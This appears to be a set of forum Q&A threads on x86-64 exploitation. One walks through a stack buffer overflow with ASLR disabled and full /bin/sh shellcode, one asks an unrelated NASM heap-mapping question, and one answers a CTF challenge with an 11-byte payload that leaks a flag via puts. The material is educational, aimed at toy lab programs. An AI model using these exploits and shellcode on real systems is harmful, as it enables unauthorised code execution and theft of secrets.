I am experimenting with buffer overflows for fun. I read about the topic on this forum and tried to write my own small program.
So I wrote a small C program that takes a string argument, and I run it with longer and longer input until it hits a segmentation fault.
I keep growing the argument until gdb shows that I overwrote the return address with "A", which is 0x41. The buffer I copy the input string into is declared with size [5].
Here is what I did in gdb.
run $(perl -e 'print "A"x32 ; ')
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400516 in main (argc=Cannot access memory at address 0x414141414141412d
Then I figured out that it takes 16 'A' to overwrite.
run $(perl -e 'print "A"x16 . "C"x8 . "B"x32 ; ')
0x0000000000400516 in main (argc=Cannot access memory at address 0x434343434343432f
)
Which tells us that the 8 "C" are overwriting the return address.
According to the online tutorials, if I supply a valid address instead of the 8 "C", I can jump to some place and execute code. So I filled the memory after the initial 16 "A" with extra bytes.
The next step was to execute
run $(perl -e 'print "A"x16 . "C"x8 . "B"x200 ; ')
rax 0x0 0
rbx 0x3a0001bbc0 249108216768
rcx 0x3a00552780 249113683840
rdx 0x3a00553980 249113688448
rsi 0x42 66
rdi 0x2af9e57710e0 47252785008864
rbp 0x4343434343434343 0x4343434343434343
rsp 0x7fffb261a2e8 0x7fffb261a2e8
r8 0xffffffff 4294967295
r9 0x0 0
r10 0x22 34
r11 0xffffffff 4294967295
r12 0x0 0
r13 0x7fffb261a3c0 140736186131392
r14 0x0 0
r15 0x0 0
rip 0x400516 0x400516 <main+62>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]
After examining the 200 bytes of memory after $rsp, I found an address and did the following:
run $(perl -e 'print "A"x16 . "\x38\xd0\xcb\x9b\xff\x7f" . "\x90"x50 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" ; ')
This, however, does not do anything. I would be grateful if someone could give me an idea of what I am doing wrong.
First, make sure address space layout randomization (ASLR) is disabled by setting randomize_va_space to 0. On Ubuntu you would run the following as root:
echo 0 > /proc/sys/kernel/randomize_va_space
Next, make sure you compile the test program without stack-smashing protection and with an executable stack. The following gcc options accomplish that:
-fno-stack-protector -z execstack
Also, I found I needed more space to actually execute a shell, so I would change your buffer to something more like buffer[64].
Next, you can run the app in gdb and get the stack address you need to return to.
First set a breakpoint right after the strcpy:
(gdb) disassemble main
Dump of assembler code for function main:
0x000000000040057c <+0>: push %rbp
0x000000000040057d <+1>: mov %rsp,%rbp
0x0000000000400580 <+4>: sub $0x50,%rsp
0x0000000000400584 <+8>: mov %edi,-0x44(%rbp)
0x0000000000400587 <+11>: mov %rsi,-0x50(%rbp)
0x000000000040058b <+15>: mov -0x50(%rbp),%rax
0x000000000040058f <+19>: add $0x8,%rax
0x0000000000400593 <+23>: mov (%rax),%rdx
0x0000000000400596 <+26>: lea -0x40(%rbp),%rax
0x000000000040059a <+30>: mov %rdx,%rsi
0x000000000040059d <+33>: mov %rax,%rdi
0x00000000004005a0 <+36>: callq 0x400450 <strcpy@plt>
0x00000000004005a5 <+41>: lea -0x40(%rbp),%rax
0x00000000004005a9 <+45>: mov %rax,%rsi
0x00000000004005ac <+48>: mov $0x400674,%edi
0x00000000004005b1 <+53>: mov $0x0,%eax
0x00000000004005b6 <+58>: callq 0x400460 <printf@plt>
0x00000000004005bb <+63>: mov $0x0,%eax
0x00000000004005c0 <+68>: leaveq
0x00000000004005c1 <+69>: retq
End of assembler dump.
(gdb) b *0x4005a5
Breakpoint 1 at 0x4005a5
Then run the app and, at the breakpoint, note the address held in the rax register.
(gdb) run `python -c 'print "A"*128';`
Starting program: APPPATH/APPNAME `python -c 'print "A"*128';`
Breakpoint 1, 0x00000000004005a5 in main ()
(gdb) info register
rax 0x7fffffffe030 140737488347136
rbx 0x0 0
rcx 0x4141414141414141 4702111234474983745
rdx 0x41 65
rsi 0x7fffffffe490 140737488348304
rdi 0x7fffffffe077 140737488347255
rbp 0x7fffffffe040 0x7fffffffe040
rsp 0x7fffffffdff0 0x7fffffffdff0
r8 0x7ffff7dd4e80 140737351863936
r9 0x7ffff7de9d60 140737351949664
r10 0x7fffffffdd90 140737488346512
r11 0x7ffff7b8fd60 140737349483872
r12 0x400490 4195472
r13 0x7fffffffe120 140737488347424
r14 0x0 0
r15 0x0 0
rip 0x4005a5 0x4005a5 <main+41>
eflags 0x206 [ PF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb)
Next, determine how many bytes of input it takes to reach the return address. I know that the 64-byte buffer crashes at 72 bytes, so I will just go from that. You could use something like Metasploit's pattern tools to find this, work it out by trial and error (running the app with growing input until you get a segfault), or make up a pattern of your own and match the value that ends up in rip, as you would with the Metasploit pattern option.
Next, there are many different ways to get the payload you need, but since we are running a 64-bit app we will use a 64-bit payload. I compiled the C version, grabbed the assembly from gdb, and then removed the \x00 bytes: mov instructions that load zero became xor, and shl/shr pairs clear the filler bytes in the shell command string. This is shown further down; for now, the payload is as follows.
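The "make up a pattern of your own" approach can be sketched in a few lines of Python 3. This is only an illustration, not Metasploit's algorithm: `make_pattern` and `find_offset` are hypothetical helper names, and the pattern is simply consecutive 4-digit decimal numbers. On x86-64 a return to a non-canonical address faults at the ret itself, so the bytes to look up are usually the 8 bytes at the top of the stack (x/gx $rsp) rather than the value shown in rip.

```python
def make_pattern(length: int) -> bytes:
    """Return `length` bytes built from the chunks 0000, 0001, 0002, ..."""
    chunks = (b"%04d" % i for i in range((length + 3) // 4))
    return b"".join(chunks)[:length]


def find_offset(pattern: bytes, leaked: bytes) -> int:
    """Return the offset of `leaked` in `pattern`, or -1 if absent or ambiguous."""
    if pattern.count(leaked) != 1:
        return -1
    return pattern.find(leaked)


if __name__ == "__main__":
    pattern = make_pattern(128)
    # Stand-in for the 8 bytes the debugger shows where the return address lives.
    # gdb prints them as a little-endian integer, so convert back to byte order first.
    leaked = pattern[72:80]
    print(pattern.decode())
    print("offset:", find_offset(pattern, leaked))
```

Feeding the printed pattern to the program as argv[1] and looking up the bytes that land in the return slot gives the offset directly, instead of growing the input one byte at a time.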
\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05
Our payload here is 48 bytes, so we have 72 - 48 = 24 bytes left to fill.
We can pad the payload with \x90 (nop) bytes, which also gives the return address some slack in where it lands. I'll add 2 at the end of the payload and 22 at the beginning. I will also tack the return address we want onto the end, in reverse (little-endian) byte order, giving the following:
`python -c 'print "\x90"*22+"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05\x90\x90\x30\xe0\xff\xff\xff\x7f"';`
Now, if you want to run it outside of gdb, you may have to adjust the return address, because the stack usually sits at a slightly different address there. In my case the address becomes \x70\xe0\xff\xff\xff\x7f outside of gdb. I just increased it until it worked, going to 40, then 50, then 60, then 70.
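The layout described above (22 nops, the 48-byte payload, 2 nops, then the return address) can be checked with a short Python 3 sketch. The names `build_argument`, `OFFSET_TO_RET`, `NOPS_BEFORE` and `NOPS_AFTER` are made up for illustration; the shellcode bytes and both addresses are the ones quoted in this answer.

```python
import struct
import sys

# Shellcode bytes exactly as listed in the answer (48 bytes).
SHELLCODE = (
    b"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11"
    b"\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11"
    b"\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05"
)

OFFSET_TO_RET = 72  # bytes of input before the saved return address
NOPS_BEFORE = 22
NOPS_AFTER = 2


def build_argument(return_address: int) -> bytes:
    """Lay out nops + shellcode + nops, then the little-endian return address."""
    body = b"\x90" * NOPS_BEFORE + SHELLCODE + b"\x90" * NOPS_AFTER
    assert len(body) == OFFSET_TO_RET
    # Pack as 8 little-endian bytes, then drop the high zero bytes: an argv
    # string cannot contain \x00, and strcpy stops at the first one anyway.
    address = struct.pack("<Q", return_address).rstrip(b"\x00")
    return body + address


if __name__ == "__main__":
    # 0x7fffffffe030 was the address seen inside gdb; 0x7fffffffe070 outside it.
    sys.stdout.buffer.write(build_argument(0x7FFFFFFFE030))
```

Keeping the address as a parameter makes it easy to step through candidate values (…40, …50, …60, …70) when running outside the debugger.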
test app source
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char name[64];
strcpy(name, argv[1]);
printf("Arg[1] is :%s\n", name);
return 0;
}
This is the payload in C
#include <unistd.h>
int main()
{
execve("/bin/sh", NULL, NULL);
}
And the payload as inline assembly, which will build and run:
int main() {
__asm__(
"mov $0x0,%rdx\n\t" // arg 3 = NULL
"mov $0x0,%rsi\n\t" // arg 2 = NULL
"mov $0x0068732f6e69622f,%rdi\n\t"
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack pointer = start of /bin/sh
"mov $0x3b,%rax\n\t" // syscall number = 59
"syscall\n\t"
);
}
And since we can't use \x00, we can zero registers with xor instead of mov, and use shifts to clear the filler bytes in the mov immediates that set up /bin/sh and the syscall number:
int main() {
__asm__(
"xor %rdx,%rdx\n\t" // arg 3 = NULL
"mov %rdx,%rsi\n\t" // arg 2 = NULL
"mov $0x1168732f6e69622f,%rdi\n\t"
"shl $0x8,%rdi\n\t"
"shr $0x8,%rdi\n\t" // first byte = 0 (8 bits)
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack ptr = start of /bin/sh
"mov $0x111111111111113b,%rax\n\t" // syscall number = 59
"shl $0x38,%rax\n\t"
"shr $0x38,%rax\n\t" // first 7 bytes = 0 (56 bits)
"syscall\n\t"
);
}
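To see why the shl/shr pairs work, the two shifts can be emulated on 64-bit integers. The following is a small Python 3 sketch; `shl_then_shr` and `MASK64` are names made up for this illustration, while the constants are the immediates from the assembly above.

```python
MASK64 = (1 << 64) - 1  # a 64-bit register drops any bits shifted past bit 63


def shl_then_shr(value: int, bits: int) -> int:
    """Emulate `shl $bits, reg` followed by `shr $bits, reg` on a 64-bit register."""
    return ((value << bits) & MASK64) >> bits


# The 0x11 filler in the top byte is shifted out, leaving the NUL terminator.
path = shl_then_shr(0x1168732F6E69622F, 8)
# The seven 0x11 filler bytes are shifted out, leaving only 0x3b.
syscall_number = shl_then_shr(0x111111111111113B, 56)

print(hex(path), path.to_bytes(8, "little"))
print(syscall_number)
```

The register contents end up identical to what the plain mov versions would load, but none of the instruction encodings contains a zero byte.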
If you compile that payload and run it under gdb, you can get the byte values you need, for example:
(gdb) x/bx main+4
0x400478 <main+4>: 0x48
(gdb)
0x400479 <main+5>: 0x31
(gdb)
0x40047a <main+6>: 0xd2
(gdb)
Or get them all at once with something like:
(gdb) x/48bx main+4
0x4004f0 <main+4>: 0x48 0x31 0xd2 0x48 0x89 0xd6 0x48 0xbf
0x4004f8 <main+12>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x11
0x400500 <main+20>: 0x48 0xc1 0xe7 0x08 0x48 0xc1 0xef 0x08
0x400508 <main+28>: 0x57 0x48 0x89 0xe7 0x48 0xb8 0x3b 0x11
0x400510 <main+36>: 0x11 0x11 0x11 0x11 0x11 0x11 0x48 0xc1
0x400518 <main+44>: 0xe0 0x38 0x48 0xc1 0xe8 0x38 0x0f 0x05
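Turning that dump into a \x-escaped string by hand is error-prone, so here is a minimal Python 3 sketch that does the conversion. `dump_to_bytes` and `escape` are hypothetical helper names, and the parser assumes the exact `address <symbol>: 0x.. 0x..` line shape shown above.

```python
GDB_DUMP = """\
0x4004f0 <main+4>: 0x48 0x31 0xd2 0x48 0x89 0xd6 0x48 0xbf
0x4004f8 <main+12>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x11
0x400500 <main+20>: 0x48 0xc1 0xe7 0x08 0x48 0xc1 0xef 0x08
0x400508 <main+28>: 0x57 0x48 0x89 0xe7 0x48 0xb8 0x3b 0x11
0x400510 <main+36>: 0x11 0x11 0x11 0x11 0x11 0x11 0x48 0xc1
0x400518 <main+44>: 0xe0 0x38 0x48 0xc1 0xe8 0x38 0x0f 0x05
"""


def dump_to_bytes(dump: str) -> bytes:
    """Collect the byte values that follow the first ':' on each dump line."""
    values = []
    for line in dump.splitlines():
        if ":" not in line:
            continue
        _, _, data = line.partition(":")
        values.extend(int(token, 16) for token in data.split())
    return bytes(values)


def escape(raw: bytes) -> str:
    """Format bytes as a \\x-escaped string suitable for pasting into a command."""
    return "".join("\\x%02x" % byte for byte in raw)


if __name__ == "__main__":
    print(escape(dump_to_bytes(GDB_DUMP)))
```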
Well for starters... Are you entirely sure that the address on the stack is the return pointer and not a pointer to say a data structure or string somewhere? If that is the case it will use that address instead of the string and could just end up doing nothing :)
So check if your function uses local variables as these are put on the stack after the return address. Hope this helps ^_^ And good luck!
I haven't worked with x64 much, but a quick look says you have 16 bytes until the rip overwrite.
Instead of the \x90 bytes, try \xCC bytes to see whether controlled code redirection has occurred. If it has, gdb should land in the \xCC pool and pause (\xCC is the int3 instruction, in effect a hardcoded breakpoint).
I've tried to reduce the code to something more minimal to demonstrate the problem.
BITS 64
global _start:function
global BIG_BAD_BLOCK:data
section .rodata progbits alloc noexec nowrite align=4
hc_str_a: db "Example", 0x0
section .bss nobits alloc noexec write align=4
personZ: resb 20 ;
personX: resb 20 ;
section FAKE_HEAP nobits alloc noexec write align=1
NEXT_ADDR: resq 1 ; pointer to the next available byte within the block
BIG_BAD_BLOCK: resb 204800 ; 200 KB chunk of memory
; cpu instructions
section .text progbits alloc exec nowrite align=16
_start: ; start(argc, argv, envp) // the kernel calls _start() with the args provided by the execve() system call
mov rdi, rsp ; (int*) rdi = rsp // argc is the first thing on the stack
add rdi, 8 ; (char**) rdi = (unsigned long) rdi + 8 // argv begins 8 bytes after argc
mov ecx, dword [rsp] ; (unsigned int) ecx = *((int*) rsp) // argc : the kernel passes initial program arguments on the stack, rather than by registers
mov eax, ecx ; (unsigned int) eax = ecx
mov ebx, 8 ; (unsigned int) ebx = 8
mul ebx ; (unsigned int) eax = argc * 8 // how many bytes long is the argv array
add eax, 8 ; (unsigned int) eax += 8 // byte length of argv + 8 byte offset for argv's trailing null
add rax, rdi ; (char**) rax = (unsigned long) argv + eax
mov rsi, rax ; (char**) rsi = envp //
mov eax, ecx ; (unsigned int) eax = argc //
call init ; init(argc, argv, envp)
nop ; // ignore the do-nothing instruction
init:
push rax ; // save the register we are going to clobber (argc)
push rdi ; // save the register we are going to clobber (argv)
push rsi ; // save the register we are going to clobber (envp)
push rbp ; (stackframe*) (--rsp) = (stackframe*) rbp // save copy of old top-of-stack at the new top-of-stack 8 bytes down
mov rbp, rsp ; (stackframe*) rbp = rsp // (this provides us a fixed pointer to the old top-of-stack)
call init_heap ; init_heap() // let's ignore this for now
mov rax, qword [rbp - 24] ; (unsigned int) eax = argc
mov rdi, qword [rbp - 16] ; (char**) rdi = argv
mov rsi, qword [rbp - 8] ; (char**) rsi = envp
call main ; (unsigned int) eax = main(argc, argv, envp)
call exit ; exit(eax)
main:
nop
mov eax, 0 ; (unsigned int) eax = 0
ret ; return 0;
init_heap:
mov qword [NEXT_ADDR], BIG_BAD_BLOCK ; NEXT_ADDR will start by pointing to the first byte of BIG_BAD_BLOCK
malloc: ; malloc(byteCount)
push qword [NEXT_ADDR]
add qword [NEXT_ADDR], rax ; NEXT_ADDR += byteCount
pop rax ; rax = (void*) memoryChunk
ret
exit: ; exit(statusCode)
mov rdi, rax ; rdi = (int) statusCode
mov rax, 60 ; rax = (unsigned long int) 60 // system call #60 is SYS_exit
syscall ; SYS_exit(statusCode) // tell kernel to kill this process
; To assemble:
; nasm -felf64 -gdwarf -o HeapProblem.o ./HeapProblem.asm
; To link:
; ld -o HeapProblem.bin HeapProblem.o
I assemble and link using the commands above. This is just 1 single assembly file. No includes. No macros. No libraries. Not even libc. It's just that 1 file you see there, assembled using the Netwide Assembler and linked using ld, with only that 1 object file being processed by the linker.
This implies:
a traditional malloc is not being loaded.
No system calls to brk are being made.
No system calls to mmap are being made.
There is nothing happening except what you see in that 1 assembly file. No other code should be interacting with this binary in any way, except for the Linux kernel itself, which loads the binary into memory when a shell invokes execve() on the path to the bin file.
After assembling and linking the file, we go to execute/debug it.
gdb HeapProblem.bin
b *_start
run one simple test
info proc mappings
process 5423
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x401000 0x1000 0x0 /var/www/html/ASM/HeapProblem.bin
0x600000 0x601000 0x1000 0x0 /var/www/html/ASM/HeapProblem.bin
0x601000 0x633000 0x32000 0x0 [heap]
0x7ffff7ffb000 0x7ffff7ffd000 0x2000 0x0 [vvar]
0x7ffff7ffd000 0x7ffff7fff000 0x2000 0x0 [vdso]
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
maintenance info sections
Exec file:
`/var/www/html/ASM/HeapProblem.bin', file type elf64-x86-64.
[0] 0x004000b0->0x00400124 at 0x000000b0: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
[1] 0x00400124->0x0040012c at 0x00000124: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
[2] 0x0060012c->0x00600158 at 0x0000012c: .bss ALLOC
[3] 0x00600158->0x00632160 at 0x0000012c: FAKE_HEAP ALLOC
[4] 0x00000000->0x00000030 at 0x0000012c: .debug_aranges READONLY HAS_CONTENTS
[5] 0x00000000->0x00000053 at 0x0000015c: .debug_info READONLY HAS_CONTENTS
[6] 0x00000000->0x0000001b at 0x000001af: .debug_abbrev READONLY HAS_CONTENTS
[7] 0x00000000->0x00000066 at 0x000001ca: .debug_line READONLY HAS_CONTENTS
print & BIG_BAD_BLOCK
$1 = (<data variable, no debug info> *) 0x600160
So. The first mapping is to the binary itself for the .text and .rodata sections. Cool. That makes sense.
The second mapping is also to the binary, seemingly for the .bss and FAKE_HEAP sections. Which is also more-or-less what we expected. Though it should be noted that the second mapping is larger than what is needed for .bss, but not large enough to completely fit both .bss and FAKE_HEAP. It can only contain .bss and part of FAKE_HEAP.
Then we've got the 3rd mapping, marked as [heap].
I expected 1 of 2 things to happen:
A) The kernel would fail to recognize my FAKE_HEAP section as a true heap, and would simply include the entire thing in the same segment as .bss
OR
B) The kernel would recognize my FAKE_HEAP as being an unusual/non-standard section with attributes that are consistent with a heap, and would thus mark the entire section as a heap. With the mapping start and end addresses exactly matching the memory address onto which FAKE_HEAP was loaded, and its natural end-boundary.
What actually happened:
The kernel seems to have recognized a heap that starts at an arbitrary point within my FAKE_HEAP. It does not align. My FAKE_HEAP starts at 0x600158, with BIG_BAD_BLOCK starting at 0x600160. The kernel says the heap starts at 0x601000. That is 3,752 bytes into my structure. Which does not make sense at all. There's no reason that the kernel should think the heap begins 3,752 bytes past the beginning of this structure.
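The offsets quoted above can be double-checked with a few lines of Python 3. This is just arithmetic on the addresses from the gdb output; `round_up` and the variable names are made up for illustration, and the 4 KiB page size is an assumption taken from the 0x1000-sized mappings.

```python
PAGE_SIZE = 0x1000  # assumed 4 KiB pages, matching the mapping sizes gdb printed

fake_heap_start = 0x600158  # FAKE_HEAP start (maintenance info sections)
fake_heap_end = 0x632160    # FAKE_HEAP end
big_bad_block = 0x600160    # print & BIG_BAD_BLOCK
heap_map_start = 0x601000   # [heap] mapping start (info proc mappings)
heap_map_end = 0x633000     # [heap] mapping end


def round_up(address: int, alignment: int) -> int:
    """Round `address` up to the next multiple of `alignment`."""
    return (address + alignment - 1) // alignment * alignment


print(heap_map_start - fake_heap_start)  # bytes from section start to [heap]
print(heap_map_start - big_bad_block)    # bytes from BIG_BAD_BLOCK to [heap]
print(hex(round_up(fake_heap_start, PAGE_SIZE)), hex(round_up(fake_heap_end, PAGE_SIZE)))
```

The numbers only show that both ends of the [heap] mapping coincide with the section's boundaries rounded up to the next page; by themselves they do not explain why the region is labelled [heap].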
So, finally, a restatement of the question(s):
Should the kernel be detecting the FAKE_HEAP section or BIG_BAD_BLOCK symbol as a heap at all?
If so, why does the start address not match up with either the section or symbol start address?
If not, why is a heap being detected at all?
How is this heap being detected?
I need to understand why this is happening. Because I cannot find a clear logical or programmatic reason for this behavior. I've been researching this problem for the past 12 hours straight and I cannot figure this out. I've been searching for issues in the assembly, the linker, and the kernel itself.
Background: I am a beginner trying to understand how to golf assembly, in particular to solve an online challenge.
EDIT: clarification: I want to print the value at the memory address of RDX. So “SUPER SECRET!”
Create some shellcode that can output the value of register RDX in <= 11 bytes. Null bytes are not allowed.
The program is compiled with the c standard library, so I have access to the puts / printf statement. It’s running on x86 amd64.
$rax : 0x0000000000010000 → 0x0000000ac343db31
$rdx : 0x0000555555559480 → "SUPER SECRET!"
gef➤ info address puts
Symbol "puts" is at 0x7ffff7e3c5a0 in a file compiled without debugging.
gef➤ info address printf
Symbol "printf" is at 0x7ffff7e19e10 in a file compiled without debugging.
Here is my attempt (intel syntax)
xor ebx, ebx ; zero the ebx register
inc ebx ; set the ebx register to 1 (STDOUT)
xchg ecx, edx ; set the ECX register to RDX
mov edx, 0xff ; set the length to 255
mov eax, 0x4 ; set the syscall to print
int 0x80 ; interrupt
hexdump of my code
My attempt is 17 bytes and includes null bytes, which aren't allowed. What other ways can I lower the byte count? Is there a way to call puts / printf while still saving bytes?
FULL DETAILS:
I am not quite sure what is useful information and what isn't.
File details:
ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5810a6deb6546900ba259a5fef69e1415501b0e6, not stripped
Source code:
void main() {
char* flag = get_flag(); // I don't get access to the function details
char* shellcode = (char*) mmap((void*) 0x1337,12, 0, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
mprotect(shellcode, 12, PROT_READ | PROT_WRITE | PROT_EXEC);
fgets(shellcode, 12, stdin);
((void (*)(char*))shellcode)(flag);
}
Disassembly of main:
gef➤ disass main
Dump of assembler code for function main:
0x00005555555551de <+0>: push rbp
0x00005555555551df <+1>: mov rbp,rsp
=> 0x00005555555551e2 <+4>: sub rsp,0x10
0x00005555555551e6 <+8>: mov eax,0x0
0x00005555555551eb <+13>: call 0x555555555185 <get_flag>
0x00005555555551f0 <+18>: mov QWORD PTR [rbp-0x8],rax
0x00005555555551f4 <+22>: mov r9d,0x0
0x00005555555551fa <+28>: mov r8d,0xffffffff
0x0000555555555200 <+34>: mov ecx,0x22
0x0000555555555205 <+39>: mov edx,0x0
0x000055555555520a <+44>: mov esi,0xc
0x000055555555520f <+49>: mov edi,0x1337
0x0000555555555214 <+54>: call 0x555555555030 <mmap@plt>
0x0000555555555219 <+59>: mov QWORD PTR [rbp-0x10],rax
0x000055555555521d <+63>: mov rax,QWORD PTR [rbp-0x10]
0x0000555555555221 <+67>: mov edx,0x7
0x0000555555555226 <+72>: mov esi,0xc
0x000055555555522b <+77>: mov rdi,rax
0x000055555555522e <+80>: call 0x555555555060 <mprotect@plt>
0x0000555555555233 <+85>: mov rdx,QWORD PTR [rip+0x2e26] # 0x555555558060 <stdin@@GLIBC_2.2.5>
0x000055555555523a <+92>: mov rax,QWORD PTR [rbp-0x10]
0x000055555555523e <+96>: mov esi,0xc
0x0000555555555243 <+101>: mov rdi,rax
0x0000555555555246 <+104>: call 0x555555555040 <fgets@plt>
0x000055555555524b <+109>: mov rax,QWORD PTR [rbp-0x10]
0x000055555555524f <+113>: mov rdx,QWORD PTR [rbp-0x8]
0x0000555555555253 <+117>: mov rdi,rdx
0x0000555555555256 <+120>: call rax
0x0000555555555258 <+122>: nop
0x0000555555555259 <+123>: leave
0x000055555555525a <+124>: ret
Register state right before shellcode is executed:
$rax : 0x0000000000010000 → "EXPLOIT\n"
$rbx : 0x0000555555555260 → <__libc_csu_init+0> push r15
$rcx : 0x000055555555a4e8 → 0x0000000000000000
$rdx : 0x0000555555559480 → "SUPER SECRET!"
$rsp : 0x00007fffffffd940 → 0x0000000000010000 → "EXPLOIT\n"
$rbp : 0x00007fffffffd950 → 0x0000000000000000
$rsi : 0x4f4c5058
$rdi : 0x00007ffff7fa34d0 → 0x0000000000000000
$rip : 0x0000555555555253 → <main+117> mov rdi, rdx
$r8 : 0x0000000000010000 → "EXPLOIT\n"
$r9 : 0x7c
$r10 : 0x000055555555448f → "mprotect"
$r11 : 0x246
$r12 : 0x00005555555550a0 → <_start+0> xor ebp, ebp
$r13 : 0x00007fffffffda40 → 0x0000000000000001
$r14 : 0x0
$r15 : 0x0
(This register state is a snapshot at the assembly line below)
●→ 0x555555555253 <main+117> mov rdi, rdx
0x555555555256 <main+120> call rax
Since I already spilled the beans and "spoiled" the answer to the online challenge in comments, I might as well write it up. 2 key tricks:
Create 0x7ffff7e3c5a0 (&puts) in a register with lea reg, [reg + disp32], using the known value of RDI which is within the +-2^31 range of a disp32. (Or use RBP as a starting point, but not RSP: that would need a SIB byte in the addressing mode).
This is a generalization of the code-golf trick of using lea edi, [rax+1] to create small constants from other small constants (especially 0) in 3 bytes, with code that runs less slowly than push imm8 / pop reg.
The disp32 is large enough to not have any zero bytes; you have a couple registers to choose from in case one had been too close.
Copy a 64-bit register in 2 bytes with push reg / pop reg, instead of 3-byte mov rdi, rdx (REX + opcode + modrm). No savings if either push needs a REX prefix (for R8..R15), and actually costs bytes if both are "non-legacy" registers.
See other answers on Tips for golfing in x86/x64 machine code on codegolf.SE for more.
bits 64
lea rsi, [rdi - 0x166f30]
;; add rbp, imm32 ; alternative, but that would mess up a call-preserved register so we might crash on return.
push rdx
pop rdi ; copy RDX to first arg, x86-64 SysV calling convention
jmp rsi ; tailcall puts
This is exactly 11 bytes, and I don't see a way for it to be smaller. add r64, imm32 is also 7 bytes, same as LEA. (Or 6 bytes if the register is RAX, but even the xchg rax, rdi short form would cost 2 bytes to get it there, and the RAX value is still the fgets return value, which is the small mmap buffer address.)
The puts function pointer doesn't fit in 32 bits, so we need a REX prefix on any instruction that puts it into a register. Otherwise we could just mov reg, imm32 (5 bytes) with the absolute address, not deriving it from another register.
$ nasm -fbin -o exploit.bin -l /dev/stdout exploit.asm
1 bits 64
2 00000000 488DB7D090E9FF lea rsi, [rdi - 0x166f30]
3 ;; add rbp, imm32 ; we can avoid messing up any call-preserved registers
4 00000007 52 push rdx
5 00000008 5F pop rdi ; copy to first arg
6 00000009 FFE6 jmp rsi ; tailcall
$ ll exploit.bin
-rw-r--r-- 1 peter peter 11 Apr 24 04:09 exploit.bin
$ ./a.out < exploit.bin # would work if the addresses in my build matched yours
My build of your incomplete .c uses different addresses on my machine, but it does reach this code (at address 0x10000, i.e. mmap_min_addr, which mmap picks after the amusing choice of 0x1337 as a hint address; that hint isn't even page-aligned, but it doesn't result in EINVAL on current Linux).
Since we only tailcall puts with correct stack alignment and don't modify any call-preserved registers, this should successfully return to main.
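The displacement and the zero-byte check can be reproduced with a short Python 3 sketch. It uses the puts and RDI values from the question; `encode_lea_rsi_rdi` is a helper name made up for this illustration, and the opcode bytes are the ones in the NASM listing above.

```python
import struct

PUTS = 0x7FFFF7E3C5A0  # from `info address puts` in the question
RDI = 0x7FFFF7FA34D0   # rdi in the register dump before the shellcode runs

disp = PUTS - RDI  # must fit in a signed 32-bit displacement


def encode_lea_rsi_rdi(disp32: int) -> bytes:
    """REX.W, opcode 8D, ModRM B7 (mod=10, reg=rsi, rm=rdi), then disp32."""
    return b"\x48\x8d\xb7" + struct.pack("<i", disp32)


# lea rsi, [rdi + disp] ; push rdx ; pop rdi ; jmp rsi
shellcode = encode_lea_rsi_rdi(disp) + b"\x52\x5f\xff\xe6"

print(hex(disp), shellcode.hex(), len(shellcode))
print("bad bytes present:", b"\x00" in shellcode or b"\n" in shellcode)
```

With a different libc build the two addresses change, so the displacement has to be recomputed and rechecked for 0x00 and 0x0a bytes.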
Note that 0 bytes (ASCII NUL, not NULL) would actually work in shellcode for this test program, if not for the requirement that forbids it.
The input is read using fgets (apparently to simulate a gets() overflow).
fgets actually can read a 0 aka '\0'; the only critical character is 0xa aka '\n' newline. See Is it possible to read null characters correctly using fgets or gets_s?
Often buffer overflows exploit a strcpy or something else that stops on a 0 byte, but fgets only stops on EOF or newline. (Or the buffer size, a feature gets is missing, hence its deprecation and removal from even the ISO C standard library! It's literally impossible to use safely unless you control the input data). So yes, it's totally normal to forbid zero bytes.
BTW, your int 0x80 attempt is not viable: What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code? - you can't use the 32-bit ABI to pass 64-bit pointers to write, and the string you want to output is not in the low 32 bits of virtual address space.
Of course, with the 64-bit syscall ABI, you're fine if you can hardcode the length.
push rdx
pop rsi
shr eax, 16 ; fun 3-byte way to turn 0x10000 into 1 (__NR_write in the 64-bit ABI), instead of just push 1 / pop
mov edi, eax ; STDOUT_FD = __NR_write
lea edx, [rax + 13 - 1] ; 3 bytes. RDX = 13 = string length
; or mov dl, 0xff ; 2 bytes leaving garbage in rest of RDX
syscall
